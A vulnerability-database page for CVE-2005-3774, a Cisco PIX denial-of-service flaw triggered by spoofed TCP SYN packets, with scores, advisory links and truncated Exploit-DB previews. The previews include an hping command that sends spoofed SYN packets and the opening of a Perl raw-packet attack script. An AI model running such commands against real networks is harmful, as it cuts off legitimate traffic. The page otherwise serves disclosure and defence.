CVE-2005-3774
published 2005-11-23CVE-2005-3774: Cisco PIX 6.3 and 7.0 allows remote attackers to cause a denial of service (blocked new connections) via spoofed TCP packets that cause the PIX to create…
PriorityP429medium5CVSS 2.0
AVNACLAuNCNINAP
EXPLOIT
EPSS
18.21%
96.8th percentile
Cisco PIX 6.3 and 7.0 allows remote attackers to cause a denial of service (blocked new connections) via spoofed TCP packets that cause the PIX to create embryonic connections that that would not produce a valid connection with the end system, including (1) SYN packets with invalid checksums, which do not result in a RST; or, from an external interface, (2) one byte of "meaningless data," or (3) a TTL that is one less than needed to reach the internal destination.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cisco | pix | — | — |
| cisco | pix | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Cisco PIX - Spoofed TCP SYN Packets Remote Denial of Service
exploitdb·2005-11-23
CVE-2005-3774 Cisco PIX - Spoofed TCP SYN Packets Remote Denial of Service
Cisco PIX - Spoofed TCP SYN Packets Remote Denial of Service
---
# The easy way by logic [email protected] (line 2) untested /str0ke
# hping -c 1 -S -s 31337 -k -b -p 22 10.0.xx.xxx
#!/usr/bin/perl
eval ("use Getopt::Long;");die "[error] Getopt::Long perl module is not installed \n" if $@;
eval ("use Net::RawIP;");die "[error] Net::RawIP perl module is not installed \n" if $@;
eval ("use Term::ProgressBar;");
die "[error] Term::ProgressBar perl module is not installed \n" if $@;
my $VERSION = "0.1";
print "$0, $PgmName, V $VERSION \n";
GetOptions (
"help" =>\$usage,
"device=s" => \$device,
"source=s" =>\$sourceip,
"dest=s"=>\$destip,
"sourcemac=s"=>\$sourcemac,
"destmac=s"=>\$destmac,
"port=n"=> \$tcpport,
);
######################## Config option ####################
my $timeout = "0
Exploit-DB
Cisco PIX - TCP SYN Packet Denial of Service
exploitdb·2005-11-22
CVE-2005-3774 Cisco PIX - TCP SYN Packet Denial of Service
Cisco PIX - TCP SYN Packet Denial of Service
---
source: https://www.securityfocus.com/bid/15525/info
Cisco PIX is susceptible to a remote denial-of-service vulnerability when handling certain TCP SYN packets.
This issue allows attackers to temporarily block network traffic to arbitrarily targeted TCP services. By repeating the attack, a prolonged denial-of-service condition is possible.
This issue is tracked by the following Cisco Bug IDs:
- CSCsc14915: PIX 6.3 Spoofed TCP SYN packets can block legitimate TCP connections
- CSCsc16014: PIX 7.0 Spoofed TCP SYN packets can block legitimate TCP connections
#!/usr/bin/perl
eval ("use Getopt::Long;");die "[error] Getopt::Long perl module is not installed \n" if $@;
eval ("use Net::RawIP;");die "[error] Net::RawIP perl module is not instal
No writeups or analysis indexed.
http://lists.grok.org.uk/pipermail/full-disclosure/2005-November/038971.htmlhttp://lists.grok.org.uk/pipermail/full-disclosure/2005-November/038983.htmlhttp://secunia.com/advisories/17670http://securitytracker.com/id?1015256http://www.cisco.com/en/US/products/hw/vpndevc/ps2030/products_security_notice09186a0080624a37.htmlhttp://www.cisco.com/warp/public/707/cisco-response-20051122-pix.shtmlhttp://www.kb.cert.org/vuls/id/853540http://www.osvdb.org/24140http://www.securityfocus.com/archive/1/417458/30/0/threadedhttp://www.securityfocus.com/archive/1/426989/100/0/threadedhttp://www.securityfocus.com/archive/1/426991/100/0/threadedhttp://www.securityfocus.com/archive/1/427041/100/0/threadedhttp://www.securityfocus.com/bid/15525http://www.vupen.com/english/advisories/2005/2546https://exchange.xforce.ibmcloud.com/vulnerabilities/25077https://exchange.xforce.ibmcloud.com/vulnerabilities/25079http://lists.grok.org.uk/pipermail/full-disclosure/2005-November/038971.htmlhttp://lists.grok.org.uk/pipermail/full-disclosure/2005-November/038983.htmlhttp://secunia.com/advisories/17670http://securitytracker.com/id?1015256http://www.cisco.com/en/US/products/hw/vpndevc/ps2030/products_security_notice09186a0080624a37.htmlhttp://www.cisco.com/warp/public/707/cisco-response-20051122-pix.shtmlhttp://www.kb.cert.org/vuls/id/853540http://www.osvdb.org/24140http://www.securityfocus.com/archive/1/417458/30/0/threadedhttp://www.securityfocus.com/archive/1/426989/100/0/threadedhttp://www.securityfocus.com/archive/1/426991/100/0/threadedhttp://www.securityfocus.com/archive/1/427041/100/0/threadedhttp://www.securityfocus.com/bid/15525http://www.vupen.com/english/advisories/2005/2546https://exchange.xforce.ibmcloud.com/vulnerabilities/25077https://exchange.xforce.ibmcloud.com/vulnerabilities/25079
2005-11-23
Published